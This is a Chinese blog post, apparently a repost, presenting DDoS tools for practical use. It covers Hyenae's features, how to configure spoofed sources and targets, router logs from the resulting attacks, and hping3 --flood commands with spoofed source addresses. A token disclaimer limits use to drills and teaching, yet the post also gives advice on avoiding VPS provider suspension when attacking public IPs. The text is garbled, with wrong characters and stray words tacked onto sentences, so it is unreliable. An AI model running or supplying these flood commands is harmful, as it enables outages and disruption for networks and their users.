实用的DDos攻击工具

 来源: http://www.safecdn.cn/linux/2018/12/ddos/95.html ‎

特别提示:仅用于攻防演练及教学测试用途,禁止非法使用

Hyenae

是在windows平台上很是好用的一款ddos攻击工具,能够完成绝大多数的攻击操做。html

download

Features

  • ARP-Request flooding
  • ARP-Cache poisoning
  • PPPoE session initiation flooding
  • Blind PPPoE session termination
  • ICMP-Echo flooding
  • ICMP-Smurf attack
  • ICMP based TCP-Connection reset
  • TCP-SYN flooding
  • TCP-Land attack
  • Blind TCP-Connection reset
  • UDP flooding
  • DNS-Query flooding
  • DHCP-Discover flooding
  • DHCP starvation attack
  • DHCP-Release forcing
  • Cisco HSRP active router hijacking
  • Pattern based packet address configuration
  • Intelligent address and address protocol detection
  • Smart wildcard-based randomization
  • Daemon for setting up remote attack networks – HyenaeFE QT-Frontend support

interface

hyenae interface鬣狗界面linux

hyenae的界面比较简单,图中展现的是SYN/ACK洪泛攻击的配置选项。web

  • operation mode中能够选择网卡
  • Network Protocol中能够选择攻击方式对应的网络协议,如SYN洪泛攻击对应传输层的TCP,IP协议可选IPv4, IPv6
  • 攻击源的IP,MAC地址以及端口号能够很是灵活的设置,按MAC-IP@port的格式书写,如图中的攻击源匹配模式%-172.17.14.158@80
    • % 表明任意,在此处表明任意的MAC地址
    • 172.17.14.158为伪造的攻击源IP,能够修改成任意的合法IP
    • 80为端口号,80同时也是网络服务器的默认端口
  • 攻击目标的设置方式与攻击源一致,图中的%-172.17.14.10@80
    • % 随机生成MAC地址
    • 172.17.14.10表明被攻击的IP
    • 80为攻击目标的被攻击端口号
  • 针对TCP协议,右侧给出其对应的5个常见flags: FIN, SYN, RST, PSH, ACK
    • 能够随意进行单选或多选,以实现不一样的攻击方式
    • 随意的组合能够产生正常通讯过程当中没法出现的数据包
  • 软件下方能够设置数据包的发送速率,默认为无限速发送,这会暂用大量带宽,致使网络拥塞;固然啦,这个软件本就是为了攻击网络,致使网络瘫痪正是其目的所在
  • 选择不一样的攻击方式,会显示相应不一样的配置选项

简单说,这幅图的做用是产生MAC地址随机,IP为172.17.14.158,端口为80的伪造源,去攻击目的MAC随机,IP为172.17.14.10的web server。windows

因为目的MAC随机,当MAC地址首字节为奇数时,生成的数据包为广播包,此时将产生广播风暴,局域网内的全部设备都将收到大量的广播包,当速率很高时,很容易致使局域网瘫痪,这是须要注意的。本人当时年少轻狂,有次测试,使用全速率的广播式SYN/ACK攻击,直接致使部门的局域网瘫痪断网,幸亏是晚上,后来找人重置了部门内的网络设备才恢复,想一想真是罪过啊。服务器

Use cases

  • Land Attack
    • src: %-172.17.14.94@53
    • des: %-172.17.14.94@80
1 2 3 4
DoS *** 3118 *** {Land Attack} are suppressed! [DoS Attack: Land Attack] from source: 172.17.14.94, port 53, [DoS Attack: Land Attack] from source: 172.17.14.94, port 53, [DoS Attack: Land Attack] from source: 172.17.14.94, port 53,
  • SYN/ACK scan (TCP SYN ACK)
    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80
1 2 3 4
DoS *** 3896 *** {SYN/ACK Scan} are suppressed! [DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80, [DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80, [DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80,
  • ping flood (icmp echo)
    • src: %-172.17.14.8
    • des: %-172.17.14.94
1 2 3 4
DoS *** 1881 *** {Ping Flood} are suppressed! [DoS Attack: Ping Flood] from source: 172.17.14.8, [DoS Attack: Ping Flood] from source: 172.17.14.8, [DoS Attack: Ping Flood] from source: 172.17.14.8,
  • ping sweep (icmp echo)
    • src: %-%
    • des: %-%
1 2 3 4
DoS *** 1719 *** {Ping Sweep} are suppressed! [DoS Attack: Ping Sweep] from source: 188.167.1.1, [DoS Attack: Ping Sweep] from source: 113.172.1.5, [DoS Attack: Ping Sweep] from source: 175.181.2.6,
  • RST Scan(TCP RST)
    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80
1 2 3 4
DoS *** 4023 *** {RST Scan} are suppressed! [DoS Attack: RST Scan] from source: 172.17.14.8, port 80, [DoS Attack: RST Scan] from source: 172.17.14.8, port 80, [DoS Attack: RST Scan] from source: 172.17.14.8, port 80,
  • ACK scan (TCP ACK)
    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80
1 2 3 4
DoS *** 3989 *** {ACK Scan} are suppressed! [DoS Attack: ACK Scan] from source: 172.17.14.8, port 80, [DoS Attack: ACK Scan] from source: 172.17.14.8, port 80, [DoS Attack: ACK Scan] from source: 172.17.14.8, port 80
  • FIN scan(TCP FIN)
    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80
1 2 3 4
DoS *** 3009 *** {FIN Scan} are suppressed! [DoS Attack: FIN Scan] from source: 172.17.14.8, port 80, [DoS Attack: FIN Scan] from source: 172.17.14.8, port 80, [DoS Attack: FIN Scan] from source: 172.17.14.8, port 80,

 

hping3

用于生成和解析TCPIP协议数据包的开源工具网络

hping3一样可用于产生ddos攻击包,但与hyenae不一样的是,hping3没法手动设置MAC地址,而是根据IP地址自动获取session

须要注意的是,若是使用搬瓦工购买的vps向公网IP执行hping3攻击的话,最好不要尝试,若是要用也必定记得限速,不然就会被警告并关停,固然你有3次机会重置dom

vps warningvps警告工具

examples

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
# land attack $ sudo hping3 -V -c 10000 -d 120 -S -w 64 --keep -p 80 -s 20000 --flood -a 172.17.14.52 172.17.14.52 # syn/ack attack $ sudo hping3 -V -c 10000 -d 120 -S -A -w 64 --keep -p 80 -s 80 --flood -a 172.17.14.192 172.17.14.52 # -V verbose # -c packet count # -d data size # -p destPort # -s srcPort # -a srcIP # -S SYN tag # -A ACK tag # -w winsize # -I interface

reference

相关文章
相关标签/搜索